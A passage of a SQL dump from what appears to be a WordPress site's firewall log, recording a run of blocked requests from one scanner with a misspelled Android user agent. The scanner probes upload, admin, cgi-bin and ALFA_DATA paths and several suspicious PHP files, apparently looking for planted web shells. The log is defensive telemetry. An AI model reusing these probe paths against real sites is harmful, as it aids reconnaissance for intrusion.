User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134509,1700146738.193790,1700146738.185100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/twentyfifteen/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWZpZnRlZW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134510,1700146736.289498,1700146736.280500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134511,1700146734.557009,1700146734.547800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134512,1700146733.035548,1700146733.025500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vYXNzZXRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134513,1700146818.363680,1700146818.350400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134514,1700146929.233146,1700146929.224500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134515,1700146927.636627,1700146927.627800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134516,1700146925.954031,1700146925.944500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134517,1700146924.007207,1700146923.998400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/Admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134518,1700146922.606461,1700146922.597600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134519,1700146920.943931,1700146920.935100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/upload/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134520,1700146919.137586,1700146919.128800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134521,1700146915.156058,1700146915.146500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134522,1700146913.436748,1700146913.427900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134523,1700146911.323778,1700146911.315000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134524,1700146909.349547,1700146909.340700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134525,1700146905.247662,1700146905.233100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134526,1700146903.385851,1700146903.377100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134527,1700146901.774455,1700146901.765700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134528,1700146900.383144,1700146900.371600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134529,1700146894.541864,1700146894.461200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134530,1700146888.007227,1700146887.994800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134531,1700146880.977353,1700146880.967800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ninja-forms/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134532,1700146879.680652,1700146879.671700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/classic/inc/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134533,1700146878.069216,1700146878.047200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/mu-plugins-old/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134534,1700146864.956179,1700146864.947300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134535,1700146863.413922,1700146863.405200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134536,1700146861.701501,1700146861.685600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 